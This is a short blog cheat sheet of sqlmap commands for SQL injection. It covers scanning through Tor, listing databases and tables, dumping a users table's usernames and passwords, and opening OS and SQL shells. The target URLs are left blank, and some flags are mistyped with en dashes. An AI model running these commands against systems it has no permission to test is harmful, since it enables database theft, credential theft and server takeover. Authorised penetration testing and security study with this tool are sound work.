Posted in Security

SQL Map Cheat Sheet

Easy Scanning option

sqlmap -u ""

Scanning by using tor

sqlmap -u "" --tor --tor-type=SOCKS5

Scanning by manually setting the return time

sqlmap -u "" --time-sec 15

List all databases at the site

sqlmap -u "" --dbs

List all tables in a specific database

sqlmap -u "" -D site_db --tables

Dump the contents of a DB table

sqlmap -u "" -D site_db -T users –dump

List all columns in a table

sqlmap -u "" -D site_db -T users --columns

Dump only selected columns

sqlmap -u "" -D site_db -T users -C username,password --dump

Dump a table from a database when you have admin credentials

sqlmap -u "" –method "POST" –data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users –dump

Get OS Shell

sqlmap --dbms=mysql -u "" --os-shell

Get SQL Shell

sqlmap --dbms=mysql -u "" --sql-shell

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s